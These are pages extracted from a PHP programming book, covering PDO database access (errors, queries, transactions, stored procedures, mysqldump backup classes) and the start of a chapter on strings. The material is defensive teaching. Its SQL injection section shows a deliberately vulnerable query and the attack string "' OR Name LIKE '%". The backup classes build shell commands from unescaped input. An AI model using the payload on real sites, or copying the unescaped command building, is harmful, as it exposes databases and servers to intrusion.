  • 75. Using Databases with PDO 51 pdoError2.php (excerpt) $country = 'USA'; $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute(); $code = $stmt->errorCode(); if (empty($code)) { ⋮ proceed to fetch data } else { echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; var_dump($stmt->errorInfo()); echo '</pre>'; } Again, the program will continue on its merry way unless you specifically check for the error code. So, unless you have the Display Errors functionality turned on, use a custom error handler, or check your error logs, you may not notice it. Using Exception Mode PDO::ERRMODE_EXCEPTION creates a PDOException as well as setting the errorCode property: pdoError3.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute();
  • 76. 52 The PHP Anthology ⋮ proceed to fetch data } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; echo 'Error: ' . $e->getMessage() . '<br />'; echo 'Code: ' . $e->getCode() . '<br />'; echo 'File: ' . $e->getFile() . '<br />'; echo 'Line: ' . $e->getLine() . '<br />'; echo 'Trace: ' . $e->getTraceAsString(); echo '</pre>'; } PDO::ERRMODE_EXCEPTION allows you to wrap your code in a try {…} catch {…} block. An uncaught exception will halt the script and display a stack trace to let you know there’s a problem. The PDOException is an extension of the general PHP Exception class found in the Standard PHP Library (or SPL).8 Discussion Most people will choose to take advantage of PHP’s more powerful object oriented model, and use the Exception mode to handle errors, since it follows the object oriented style of error handling—catching and handling different types of excep­ tions—and is easier to work with. Regardless of the way you choose to handle your errors, it’s a good idea to return the text of the SQL query itself. This allows you to see exactly which query is problematic and will assist you in the error’s debugging. 8 You can learn more about the SPL and PHP’s base Exception class in the manual, at http://www.php.net/spl/ and http://www.php.net/manual/en/language.exceptions.php.
  • 77. Using Databases with PDO 53 How do I add data to, or modify data in, my database? Being able to fetch data from the database is a start, but how can you put it there in the first place? Solution We add data to the database with the SQL INSERT command, and modify data that’s already in the database with the SQL UPDATE command. Both commands can be sent to the database using either the query method or the prepare and execute methods. I’ll be using the prepare and execute methods in this solution. INSERT Data into the Database First up, let’s look at a simple INSERT, using the City table from the world database: insert.php (excerpt) $id = '4080'; $name = 'Guam'; $country = 'GU'; $district = 'Guam'; $population = 171018; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'INSERT INTO city (ID, Name, CountryCode, District, Population) VALUES (:id, :name, :country, :district, :pop)'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':id', $id); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); } catch (PDOException $e) { echo 'PDO Exception Caught. ';
  • 78. 54 The PHP Anthology echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?> UPDATE Data in the Database And here’s a simple UPDATE, using the City table from the world database: update.php (excerpt) $id = '4080'; $name = 'Guam'; $country = 'GU'; $district = 'Guam'; $population = 171019; // data provided by the U.S. Census // Bureau, International Data Base // Mid year 2006 try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'UPDATE city SET Name = :name, CountryCode = :country, District = :district, Population = :pop WHERE ID = :id'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':id', $id); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } ?>
  • 79. Using Databases with PDO 55 Discussion Note that other than changing the SQL statement used in the prepare method, the code in both examples above is exactly the same. We do like to keep things easy in PHP! In a practical application, some, if not all of the inputs to the query will be garnered from user-generated content. Because we’re using the prepare and execute methods, we don’t have to worry about an SQL injection attack on this query: all the variables will be escaped automatically. Be Cautious with UPDATE and DELETE Be very careful when you use UPDATE or DELETE in your SQL. If you don’t have a WHERE clause in your SQL statement, you will end up updating or deleting all the rows in the table. Needless to say, either outcome could cause serious problems! How do I protect my web site from an SQL injection attack? An SQL injection attack occurs when an attacker exploits a legitimate user input mechanism on your site to send SQL code that your unsuspecting script passes on to the database for execution. The golden rule for avoiding SQL injection attacks is: escape all data from external sources before letting it near your database. That rule doesn’t just apply to INSERT and UPDATE queries, but also to SELECT queries. As we discussed earlier, using prepared statements for all your queries within a script almost eliminates the problem of SQL injection attacks, but if you choose to use the query method, you’ll have no such protection—you’ll have to manually es­ cape any user input that goes into the query. Let’s look at an example: sqlInject.php (excerpt) //$city = 'New York'; $city ="' or Name LIKE '%" ; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE,
  • 80. 56 The PHP Anthology PDO::ERRMODE_EXCEPTION); $sql = "Select * from city where Name ='". $city ."'"; foreach ($dbh->query($sql) as $row) { print $row['Name'] . "t"; print $row['CountryCode'] . "t"; print $row['Population'] . "n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } In this example, we’ll pretend that the $city variable used in the SQL statement comes from a form submitted by the user. A typical user would submit something like New York. This would give us the following SQL statement: Select * from city where Name ='New York' This would cause no problems within the script. A savvy attacker, however, may enter ' OR Name LIKE '%, which would give us the following SQL statement: Select * from city where Name ='' OR Name LIKE '%' This input opens the entire table to the attacker. “No big deal,” you say. “It’s only a list of cities.” Yes, but what if instead of our simple city table, this was the author­ ized users table? The attacker would have access to extremely sensitive data! Solution Luckily, this issue is fairly easy to avoid, though the solution will mean more work for you. You can use PDO’s handy quote method to escape any data that you’re passing to the SQL string. Simply change the SQL code to this: $sql = "Select * from city where Name ='".$dbh->quote($city)."'";
  • 81. Using Databases with PDO 57 Remember that you’ll need to quote each individual piece of data you use in the SQL query—there aren’t any shortcuts! That is, unless you consider prepare and execute a shortcut. Discussion If you’re using the PDO->query method, always quote your input. Always! If you choose to use the prepare and execute approach, you won’t have to quote the values that you bind to the prepared SQL (for example, the values to be inser­ ted)—that’s all done for you by the driver. However, there may be times when you won’t be able to bind a variable to the prepared SQL. In such cases, you’ll need to quote any values you use that cannot be bound (for example, a GROUP BY or ORDER BY clause, or the table name) if you’re building a dynamic SQL statement. Remember: a strong defense is a good offense. How do I create flexible SQL statements? SQL is a powerful language for manipulating data. With PHP, we can construct SQL statements out of variables—an approach that can be useful for sorting a table by a single column, or displaying a large result set across multiple pages. Solution Until the SQL is prepared and executed, it’s still just a string that you can manipulate as you’d expect. This solution uses concatenation based on user input to select cities from the specified country and display them in a specified order: flexSQLConcat.php (excerpt) $validCountries = array ('USA', 'CAN', 'GU', 'ISR'); if (isset($_GET['country']) && in_array($_GET['country'], $validCountries)) { $country = $_GET['country']; } else { $country = 'USA'; }
  • 82. 58 The PHP Anthology $order = (!isset($_GET['order'])) ? FALSE : $_GET['order']; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT * FROM city WHERE CountryCode = :country'; switch ($order) { case 'district': // Add to the $sql string $sql .= " ORDER BY District"; break; case 'pop': $sql .= " ORDER BY Population DESC"; break; default: // Default sort by title $sql .= " ORDER BY Name"; break; } $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country); $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { print $row['Name'] . "t"; print $row['CountryCode'] . "t"; print $row['Population'] . "n"; } } catch (Exception $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } In this code, the user input is read either from a web form that has GET as its method, or a URL with a query string. In the switch statement above, we’re generating dy­ namic SQL using concatenation. The $order value is read, and an ORDER BY clause is added to the SQL query.
  • 83. Using Databases with PDO 59 Discussion An alternative solution involves using sprintf to build your dynamic SQL. This approach is similar to binding variables to the prepared SQL: flexSQLSprintf.php (excerpt) switch ($order) { case 'district': $orderby = " District"; break; case 'pop': $orderby = " Population DESC"; break; default: $orderby = " Name"; break; } $format = 'SELECT * FROM city WHERE CountryCode = :country ORDER BY %s'; $sql = sprintf($format, $orderby); It’s a matter of personal style, but either of these approaches can be extended to columns, table names, WHERE clauses, LIMIT clauses, and anything else you wish to include in your SQL query. Remember that until the point at which the SQL is prepared and executed, it’s just a string that you can manipulate as much as you require. How do I find out how many rows I’ve touched? Often, it’s useful to be able to count the number of rows returned or affected by a query before you do anything with them. This capability is particularly handy when you’re splitting results across pages, or producing statistical information. Solutions The two solutions that follow will enable you to count the number of rows returned, and the number of rows affected, by your operations within the database.
  • 84. 60 The PHP Anthology Counting the Rows Returned PDO doesn’t have a magic method that counts the number of rows returned from a SELECT call. You can use the PDOStatement->rowCount method to return the number of rows returned by a SELECT statement with some PDO database drivers. However, as the behavior of this function isn’t guaranteed to be consistent with every database driver, I won’t cover it here. Feel free to try it yourself with your database driver, but keep in mind that if you need to write portable code, this approach is not reliable. There is, however, a solution that works around this lack of a useful method—it uses the SQL aggregate function COUNT. Here’s the code that will count the number of rows returned: count.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT COUNT(*) FROM city WHERE CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $result = $stmt->execute(); echo 'There are ', $stmt->fetchColumn(), ' rows returned.'; } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } Discussion COUNT returns the number of rows from a query, or a part of a query, and is commonly used with the DISTINCT keyword. SQL’s aggregate function COUNT is widely suppor­ ted by the various database systems. For more information on how your database handles COUNT, see your database’s documentation.
  • 85. Using Databases with PDO 61 Counting the Rows Affected We can use the PDOStatement->rowCount method to find out how many rows were affected by an UPDATE, INSERT or DELETE query. The use of rowCount is not common in typical PHP applications, but it can be a good way to inform users that “Number of records deleted from the Customers table: n.” Here’s the code you’ll need: affect.php (excerpt) $country = 'AFG'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'DELETE FROM city WHERE CountryCode = :country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $result = $stmt->execute(); echo 'Number of records deleted from the city table: '; echo $stmt->rowCount(); } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } After you call PDOStatement->execute, you can call the PDOStatement->rowCount method to return the number of rows affected. Make Sure you Add a WHERE Clause When you’re using the SQL commands UPDATE and DELETE, always make sure you add a WHERE clause. Without it, you will either be updating an entire column in the database, or deleting all the data in the table, neither of which is what you likely meant to do!
  • 86. 62 The PHP Anthology How do I find out a new INSERT’s row number in an autoincrementing field? When you’re dealing with autoincrementing columns in database tables, you’ll often need to find out the ID of a row you’ve just inserted, so that you can update other tables with this information. After all, that’s how relationships between tables are maintained. Solution To accomplish this task, PDO provides the listInsertId method, which returns the ID generated by the last INSERT operation if this capability is supported by the driver being used.9 Here’s how it works: lastId.php (excerpt) $name = 'Dededo'; $country = 'GU'; $district = 'Guam'; $population = 42980; // according to the 2000 US census try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'INSERT INTO city (Name, CountryCode, District, Population) VALUES (:name, :country, :district, :pop)'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':name', $name); $stmt->bindParam(':country', $country); $stmt->bindParam(':district', $district); $stmt->bindParam(':pop', $population); $stmt->execute(); echo 'ID of last insert: ', $dbh->lastInsertId(); } catch (PDOException $e) { 9 listInsertId may not behave consistently when it’s used with different database drivers—some database drivers do not support autoincrementing fields. Read the manual page at http://www.php.net/manual/en/function.PDO-lastInsertId.php for more information.
  • 87. Using Databases with PDO 63 echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } Discussion When you’re using the lastInsertId method, be sure to use the PDO object ($dbh above), not the PDOStatement object (that’s the object you create when you use prepare—$stmt above). If you don’t, an error will result. How do I search my table? Some people are just impatient; rather than exploring your site with the friendly navigation system you’ve provided, they demand relevant information now! And obliging PHP developers like you and I happily implement search functionality to provide visitors with a shortcut to the information they want. In the bad old days when all content was stored in the form of HTML files, develop­ ing usable search functionality could be quite a problem, but now that we use databases to store content, performing searches becomes much easier. Solution The most basic form of search occurs against a single column, with the database LIKE operator: like.php (excerpt) $country = 'A'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'SELECT * FROM city WHERE CountryCode LIKE :country'; $stmt = $dbh->prepare($sql); $country = $country.'%'; $stmt->bindParam(':country', $country, PDO::PARAM_STR);
  • 88. 64 The PHP Anthology $stmt->execute(); while ($row = $stmt->fetchObject()) { print $row->Name . "t"; print $row->CountryCode . "t"; print $row->Population . "n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } Discussion The LIKE search is supported by almost all database systems,10 and is usually used in conjunction with wildcard characters. The % character I used in the example above matches any number of characters—even zero characters. The wildcard character used in the example allows my query to find any city in a country that starts with the letter A. The other wildcard character that’s typically available is _, which will match any single character. So if, in the example above, I wanted to find only cities in countries that started with A and ended with G, I’d need to change just one line of code: /* $country = $country.'%'; <- remove this */ $country = $country.'_G'; // <- add this If you need a more complicated search method, check your database documentation to see what’s available. For example, MySQL has FULLTEXT search capabilities, as explained on the MySQL manual site.11 10 You should verify the availability of the LIKE keyword, and the wildcard characters you want to use with it, in your database system documentation. 11 http://dev.mysql.com/doc/refman/5.0/en/fulltext-search.html
  • 89. Using Databases with PDO 65 How do I work with transactions? Let’s imagine we’re trying to complete a transaction at our local bank—we need to move some money from our savings account to our checking account (to pay for that vacation, of course). Now, if a problem arises in the middle of the transaction (after you withdraw the money from the savings account, but before you deposit it into the checking account), the money will disappear, and you can forget that vaca­ tion. Or does it? If you need to run a group of SQL queries as one operation in order to maintain the integrity of your data, then you need transactions. Almost all databases provide transaction support in one form or another, and knowing how to use transactions with PDO can help you secure that well-deserved vacation. Solution We start the hypothetical transaction with the PDO->beginTransaction method, and if all goes well, end it with PDO->commit. If a problem occurs, we use the PDO->rollback method to undo everything that’s taken place in the transaction: transaction.php (excerpt) try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $dbh->beginTransaction(); $sql = 'INSERT INTO transactions (acctNo, type, value, adjustment) VALUES (:acctNo, :type, :value, :adjust)'; $stmt = $dbh->prepare($sql); $stmt->execute(array(':acctNo'=>$acctFrom, ':type'=>$withdrawal, ':value'=>$amount, ':adjust'=>'-')); $sql = 'INSERT INTO transactions (acctNo, type, value, adjustment) VALUES (:acctNo, :type, :value, :adjust)'; $stmt = $dbh->prepare($sql); $stmt->execute(array(':acctNo'=>$acctTo, ':type'=>$deposit, ':value'=>$amount, ':adjust'=>'+'));
  • 90. 66 The PHP Anthology $dbh->commit(); } catch (Exception $e) { $dbh->rollBack(); ⋮ further error handling here } Discussion Before we get into the deeper nuances of PDO’s transaction handling capabilities, let’s look at the official definition of database transactions from the PDO manual page12: “If you’ve never encountered transactions before, they offer 4 major features: Atomicity, Consistency, Isolation and Durability (ACID).13 In layman’s terms, any work carried out in a transaction, even if it is carried out in stages, is guaranteed to be applied to the database safely, and without interference from other connections, when it is committed. Transactional work can also be automatically undone at your request (provided you haven’t already committed it), which makes error handling in your scripts easier.” “Transactions are typically implemented by “saving-up” your batch of changes to be applied all at once; this has the nice side effect of drastically improving the effi­ ciency of those updates. In other words, transactions can make your scripts faster and potentially more robust (you still need to use them correctly to reap that bene­ fit).” Unfortunately, not all database systems support transactions. So, by default, PDO will run in auto-commit mode, where each query is treated as its own transaction. If the database does not support transactions, the query is issued without one. If your database supports transactions, rather than using the auto-commit feature, you can start and stop transactions manually. In the example above, the PDO->beginTransaction and PDO->commit methods are called in the try block. The 12 http://www.php.net/pdo 13 Emphasis added by the author.
  • 91. Using Databases with PDO 67 PDO->rollback is used in the catch block to roll the database back in case of a problem. How do I use stored procedures with PDO? Many databases support stored procedures—scripts that are run on your database typically in a database-specific SQL language.14 Stored procedures allow the manip­ ulation of the data close to the location where the data is held, reducing bandwidth. They maintain the separation of the data from the script logic, and allow multiple systems in potentially different languages to access the data in a uniform manner (saving you valuable coding and debugging time). Finally, stored procedures increase query speeds using predetermined execution plans, and can prevent any direct in­ teraction with the data, thereby protecting it. Solution Using PDO to work with stored procedures is fairly easy. In the example below, you’ll see the simple stored procedure we’ll be interacting with in our code.15 It does nothing more than generate the quote, “Out, damned spot!” from Shakespeare’s Macbeth: getQuote.sql (excerpt) DROP PROCEDURE IF EXISTS getQuote; DELIMITER // CREATE PROCEDURE getQuote() BEGIN DECLARE outStr VARCHAR(45); SET outStr = "Out, damned spot!"; SELECT outStr; END// DELIMITER ; Here’s the code that uses the stored procedure: 14 Such languages include PL/SQL (Oracle), T-SQL (SQL Server), PL/pgSQL (PostgreSQL), and SQL::2003 (IBM DB2 and MySQL). 15 This procedure is written in SQL::2003 syntax for MySQL.
  • 92. 68 The PHP Anthology storedProc.php (excerpt) try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'CALL getQuote()'; $stmt = $dbh->prepare($sql); $stmt->execute(); $return_string = $stmt->fetch(); } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } echo 'Called stored procedure. It returned: ', $return_string[0]; The example script will produce this output: Called stored procedure. It returned: Out, Damned Spot! Discussion Each database’s stored procedure language is different, so be sure to check your system’s documentation to identify the specific syntax you’ll need to create a stored procedure. To learn more about MySQL’s stored procedures, check out the relevant manual pages.16 In the example above, which was made for MySQL, you’ll notice that the stored procedure includes the DECLARE, SET, and SELECT statements. Generally speaking, these are needed in any MySQL stored procedure to retrieve data. Nothing special is needed to retrieve the data from the stored procedure—we just use the PDOStatement->fetch method to grab the value returned from the final SELECT 16 http://dev.mysql.com/doc/refman/5.0/en/stored-procedures.html
  • 93. Using Databases with PDO 69 statement in the stored procedure. (MySQL normally uses an OUT parameter for the stored procedure, but this is not necessary with PDO.) How do I back up my database? The bigger a database becomes, the more nerve-wracking it can be not to have a backup of the data it contains. It’s truly the stuff of nightmares: what happens if your server crashes and everything is lost? It’s common for database software to have some kind of built-in backup utility for just this reason. In this solution, we’ll work through an example that uses the mysqldump utility for the MySQL database system. Solution You can export the contents of a database from the command line using mysqldump: mysqldump -uuser -psecret world > world.sql This command will log in to MySQL as user “user” (-uuser) with the password “secret” (-psecret) and output the contents of the world database to a file called world.sql. The contents of world.sql will be a series of queries that can be run against MySQL. Using the mysql utility, we can perform the reverse operation from the command line: mysql -uuser -psecret world < world.sql You can use PHP’s system function to execute this command from within a PHP script (though you’ll need to be logged in and able to execute PHP scripts from the command line). The following example wraps the mysqldump command line utility in a handy PHP class that you can use to keep regular backups of your site: MySQLDump.class.php (excerpt) <?php class MySQLDump { private $cmd; public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz')
  • 94. 70 The PHP Anthology { $zip_util = array('gz'=>'gzip','bz2'=>'bzip2'); if (array_key_exists($zip, $zip_util)) { $fname = $dbName . '.' . date("w") . '.sql.' . $zip; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' . $dest . '/' . $fname; } else { $fname = $dbName . '.' . date("w") . '.sql'; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . ' >' . $dest . '/' . $fname; } } public function backup() { system($this->cmd, $error); if ($error) { trigger_error('Backup failed: ' . $error); } } } ?> MySQLDump Assumptions The MySQLDump class makes some assumptions about your operating system configuration. It assumes that the mysqldump utility is available in the path of the user that executes this script. If the gzip or bzip2 utilities are used, they’re also expected to be present in the user’s path. If you have a choice, use bzip2, as it provides better compression than gzip, and helps to save disk space. The following code shows how this class can be used: backup.php (excerpt) <?php require_once 'MySQLDump.class.php'; $dbUser = 'user';
  • 95. Using Databases with PDO 71 $dbPass = 'secret'; $dbName = 'world'; $dest = '/home/user/backups'; $zip = 'bz2'; $mysqlDump = new MySQLDump($dbUser, $dbPass, $dbName, $dest, $zip); $mysqlDump->backup(); ?> This code will create a backup of the world database in the /home/user/backups directory. If you test this example, make sure to change the variables to suit your setup. Discussion The $dest variable specifies the path to the directory in which the backup file should be placed. The filename that’s created will be in this format: databaseName.dayOfWeek.sql.zipExtension Here’s an example: world.1.sql.bz2 A number from 0 to 6 that represents the day of the week (0 being Sunday and 6 being Saturday) is inserted into the dayOfWeek element. This filename convention can provide a weekly rolling backup, with the files for the current week overwriting those from the previous week. Such an approach should provide adequate backups; it gives you a week to discover any serious problems, and doesn’t require excessive disk space for file storage. The use of a ZIP utility is optional. The default value of the $zip parameter is gz, which indicates the gzip utility should be used. The other option is bz2, which indicates the bzip2 utility should be used. If neither of these values is used, no compression will be made; however, for large databases it’s obviously a good idea to use a compression tool to minimize the amount of disk space required. This class is intended for use with the crontab utility, which is a Unix feature that allows you to execute scripts on a regular (for example, daily) basis.
  • 96. 72 The PHP Anthology Catering to Platform Differences You may have noticed that the above MySQLDump class will only work on a *nix server. What if your database server uses a Windows box? I offer the following solution to circumvent this problem. First we define an abstract MySQLDump class, then we extend it to create a class for each platform, and finally we create a factory method to instantiate the correct MySQLDump object needed. Here’s our abstract MySQLDump class: AbstractMySQLDump.class.php (excerpt) require_once 'MySQLDump_ms.class.php'; require_once 'MySQLDump_nix.class.php'; abstract class MySQLDump { public static function factory($dbUser, $dbPass, $dbName, $dest, $zip) { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { return new MySQLDump_ms($dbUser, $dbPass, $dbName, $dest, $zip); } else { return new MySQLDump_nix($dbUser, $dbPass, $dbName, $dest, $zip); } } abstract public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz'); public function backup() { system($this->cmd, $error); if ($error) { throw new MySQLDumpException( 'Backup failed: Command = ' . $this->cmd . ' Error = ' . $error); } }
  • 97. Using Databases with PDO 73 } class MySQLDumpException extends Exception {} The backup method represents our backup API. Child classes need to implement a custom constructor that sets the cmd property. Overriding the backup method is optional. The static method factory will instantiate a MySQLDump object instance based on the PHP_OS constant—representing the host platform. We’ve also added a custom exception class, MySQLDumpException, for error handling. The *nix version of our backup class will contain an implementation similar to the solution class above, but we’ll need to change the class definition so that it extends the abstract MySQLDump class: MySQLDump_nix.class.php (excerpt) require_once 'AbstractMySQLDump.class.php'; class MySQLDump_nix extends MySQLDump { protected $cmd; public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'gz') { $zip_util = array('gz'=>'gzip','bz2'=>'bzip2'); if (array_key_exists($zip, $zip_util)) { $fname = $dbName . '.' . date("w") . '.sql.' . $zip; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . '| ' . $zip_util[$zip] . ' >' . $dest . '/' . $fname; } else { $fname = $dbName . '.' . date("w") . '.sql'; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . ' >' . $dest . '/' . $fname; } } }
  • 98. 74 The PHP Anthology We can then make an implementation for the Windows platform: MySQLDump_ms.class.php (excerpt) require_once 'AbstractMySQLDump.class.php'; class MySQLDump_ms extends MySQLDump { protected $cmd; public function __construct($dbUser, $dbPass, $dbName, $dest, $zip = 'none') { $fname = $dbName . '.' . date("w") . '.sql'; $this->cmd = 'mysqldump -u' . $dbUser . ' -p' . $dbPass . ' ' . $dbName . ' >' . $dest . '' . $fname; } } The Windows version above includes changes to suit the Windows path and ignores the $zip argument due to the lack of gzip and bzip2 on that platform. This class also assumes that the path to the mysqldump.exe executable file is in the system PATH environment variable. Here’s an example of a backup script that makes use of the above classes on a Windows box: backup2.php (excerpt) <?php require_once 'AbstractMySQLDump.class.php'; try { $dbUser = 'user'; $dbPass = 'secret'; $dbName = 'world'; $dest = 'c:backups'; $zip = 'none'; $mysqlDump = MySQLDump::factory($dbUser, $dbPass, $dbName, $dest, $zip); $mysqlDump->backup(); } catch (Exception $e) {
  • 99. Using Databases with PDO 75 echo $e->getMessage(); } ?> Since we’ve used an abstract class to define our API, the use of the class remains the same no matter what platform it’s used on, as long as it’s one of our supported platforms. Summary There you have it—our whirlwind tour of PDO and databases is done! By now, you should have a grasp of the basic workings between PHP’s PDO extension and data­ bases. We also covered the topics of searching, stored procedures, protecting your script from SQL injection attacks, writing flexible code, and making database backups. Being able to work comfortably with a database is part of a strong foundation for PHP, and learning to make the most of PHP’s PDO extension only makes it easier. Use the examples and solutions presented here to help build on your existing database skills. I also hope you’ll take the time to learn more about SQL and your database. Learning the nuances and capabilities of your chosen database platform can only help make your code more efficient and elegant over time.
  • 101. 3 Chapter Strings Strings are arguably the basis, the raison d’etre, nay, the beating heart of PHP. After all, PHP really boils down to the input and output of strings. So, it’s hardly surprising that PHP has more string-related functions than almost any other scripting language! Unlike other languages such as C, strings in PHP are not arrays of characters; they’re considered to be a simple type, or scalar. In PHP, strings can be defined using either single (') or double (") quotes. Strings defined using double quotes are interpol­ ated—this means that variables within the string are substituted for their values. Use single quotes for strings that require no interpolation. Strings themselves are case sensitive, but a number of string functions allow operations on strings in a case-insensitive manner. The PHP manual web site’s String Functions page has links to all the string-related functions available.1 PHP’s variable interpolation is one of the many features that make the language so quick and easy to use. However, there are limits to its capabilities. First, have a look at this example: 1 http://www.php.net/strings/
  • 102. 78 The PHP Anthology <?php $who = 'world'; echo "Hello $who"; ?> Here, we have a very simple variable, $who, that has a value of 'world'. When we place the variable name in the string, we end up with an output of “Hello world”. While this example is very simple, you may run into situations where your data is contained in an array or a complex object and in these cases, we need to help the PHP interpreter along. We either enclose the variable in braces ({ and }) or use concatenation—the . operator. Here’s an example of what I mean: <?php $user = array( "first_name" => "Davey", "last_name" => "Shafik" ); // Using Braces echo "Hello {$user['first_name']} {$user['first_name']}"; // Using Concatenation echo 'Hello ' . $user['first_name'] .' '. $user['last_name']; ?> In the above example we demonstrate variable interpolation by wrapping our vari­ ables in braces. The final statement shows that we can achieve the same output if we use simple concatenation. Even though strings are considered to be scalar values, PHP has the ability to treat strings as arrays in certain situations. Consider this quick example where we output a string letter by letter in a for loop: <?php $string = 'Hello World!'; $length = strlen($string); for ($i = 0; $i < $length; $i++) { echo $string[$i] . '<br />'; } ?>
  • 103. Strings 79 Notice that we output a single letter from the string using array notation. That code will output the following: H<br />e<br />l<br />l<br />o<br /> <br />W<br />o<br />r<br />l ➥<br />d<br />!<br /> This ability to treat strings as arrays only goes so far, though. You can’t, for example, pass a string to one of PHP’s array functions. How do I output strings safely? The most common activity you will perform with strings is to output them. Whether you’re outputting strings to a browser or to a database, you’ll need to be careful to encode the strings properly. Some string data has special meaning and may, to take a best-case scenario, obscure the output; in the worst case, outputting the wrong string data can cause security vulnerabilities. Solution When outputting a string to a browser, we must consider several aspects: ■ Are you outputting a URL inside an <a> tag? ■ Are you outputting to an HTML form element? ■ Do you want to show, or remove any HTML? ■ Do you need to preserve formatting? Let’s look at an example: <?php $text = "Ben & Jerrys Ice Cream"; echo '<a href="/buy/' . rawurlencode($text) . '">Buy ' . htmlentities($text) . '</a>'; ?> Here, the $text variable string contains an ampersand (&) which we need to escape. We need to perform two separate actions on the text in order to escape the ampersand in the two places where it is used. Firstly, we need to use rawurlencode function to convert the ampersand and spaces to a valid URL string. The second operation
